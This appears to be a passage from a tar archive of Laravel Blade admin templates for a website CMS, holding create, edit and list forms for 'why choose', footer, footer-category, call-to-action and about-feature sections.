__('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="general-item-list">{{ __('content.item') }}</label> <input type="text" name="item" class="form-control" id="general-item-list"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="whyChooseModal" tabindex="-1" role="dialog" aria-labelledby="whyChooseModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="whyChooseModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('why-choose.store') }}" method="POST"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title_2">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title_2"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title_2')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="timer">{{ __('content.percent_rate') }} </label> <input type="text" name="timer" class="form-control" id="timer"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/why_choose/edit.blade.php������������������������������������������������������0000644�����������������00000007167�14765366573�0015534 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_why_choose') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('why-choose.update', $item->id) }}" method="POST"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ $item->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="timer">{{ __('content.percent_rate') }} </label> <input type="text" name="timer" class="form-control" id="timer" value="{{ $item->timer }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/footer_section/create.blade.php������������������������������������������������0000644�����������������00000007635�14765366573�0016725 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_footer') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('footer.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach($categories as $category) <option value="{{$category->id}}">{{$category->category_name}}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }} </label> <input type="text" name="url" class="form-control" id="url"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published">{{ __('content.published') }}</option> <option value="draft">{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ���������������������������������������������������������������������������������������������������views/admin/sections/footer_section/category/create.blade.php���������������������������������������0000644�����������������00000027237�14765366573�0020542 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.categories') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#categoryModal">+ {{ __('content.add_category') }}</button> </div> </div> @if (count($categories) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('footer-category.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($categories); $asc=0; @endphp @foreach ($categories as $category) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $category->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $category->category_name }}</td> <td>{{ $category->order }}</td> <td> @if($category->status == 0) <span class="badge badge-danger">{{ __('content.disable') }}</span> @else <span class="badge badge-success">{{ __('content.enable') }}</span> @endif </td> <td> <div> <a href="{{ route('footer-category.edit', $category->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $category->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $category->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('footer-category.destroy', $category->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="categoryModal" tabindex="-1" role="dialog" aria-labelledby="categoryModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="categoryModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('footer-category.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1">{{ __('content.enable') }}</option> <option value="0">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/footer_section/category/edit.blade.php�����������������������������������������0000644�����������������00000006546�14765366573�0020224 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_category') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('footer-category.update', $category->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" value="{{ $category->category_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $category->status == 1 ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="0" {{ $category->status == 0 ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $category->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection����������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/footer_section/index.blade.php�������������������������������������������������0000644�����������������00000020262�14765366573�0016560 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.footer') }}</h6> <div> <a href="{{ route('footer-category.create') }}" class="btn btn-primary mb-3 mr-2">+ {{ __('content.add_footer_category') }}</a> <a href="{{ route('footer.create') }}" class="btn btn-primary mb-3">+ {{ __('content.add_footer') }}</a> </div> </div> @if (count($footers) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('footer.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($footers); $asc=0; @endphp @foreach ($footers as $footer) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $footer->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $footer->title }}</td> <td>{{ $footer->category_name }}</td> <td>{{ $footer->order }}</td> <td> <div> <a href="{{ route('footer.edit', $footer->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $footer->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $footer->id }}" tabindex="-1" role="dialog" aria-labelledby="counterModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="counterModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('footer.destroy', $footer->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/footer_section/edit.blade.php��������������������������������������������������0000644�����������������00000010445�14765366573�0016400 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_service') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('footer.update', $footer->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach ($categories as $category) <option value="{{ $category->id}}" {{ $category->id == $footer->category_id ? 'selected' : '' }}>{{ $category->category_name }}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ $footer->title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }} </label> <input type="text" name="url" class="form-control" id="url" value="{{ $footer->url }}"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published" {{ $footer->status == "published" ? 'selected' : '' }}>{{ __('content.published') }}</option> <option value="draft" {{ $footer->status == "draft" ? 'selected' : '' }}>{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $footer->order }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/call_to_action/create.blade.php������������������������������������������������0000644�����������������00000022063�14765366573�0016645 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.call_to_action') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('call-to-action.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/call-to-action-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> @if (isset($call_to_action)) <form action="{{ route('call-to-action.update', $call_to_action->id) }}" method="POST"> @method('PUT') @csrf <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ $call_to_action->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }} </label> <input type="text" name="button_name" class="form-control" id="button_name" value="{{ $call_to_action->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }} </label> <input type="text" name="button_url" class="form-control" id="button_url" value="{{ $call_to_action->button_url }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#ctaSectionDestroyModal{{ $call_to_action->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="ctaSectionDestroyModal{{ $call_to_action->id }}" tabindex="-1" role="dialog" aria-labelledby="ctaSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="ctaSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('call-to-action.destroy', $call_to_action->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else <form action="{{ route('call-to-action.store') }}" method="POST"> @csrf <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }} </label> <input type="text" name="button_name" class="form-control" id="button_name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }} </label> <input type="text" name="button_url" class="form-control" id="button_url"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/about/edit_feature.blade.php���������������������������������������������������0000644�����������������00000010530�14765366573�0016176 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_feature') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('about.update_feature', $item->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title_2">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title_2" value="{{ $item->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title_2')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }} </label> <textarea name="description" class="form-control" id="description" rows="3">{{ $item->description }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description_2')">{{ __('<p>') }}</small> </div> 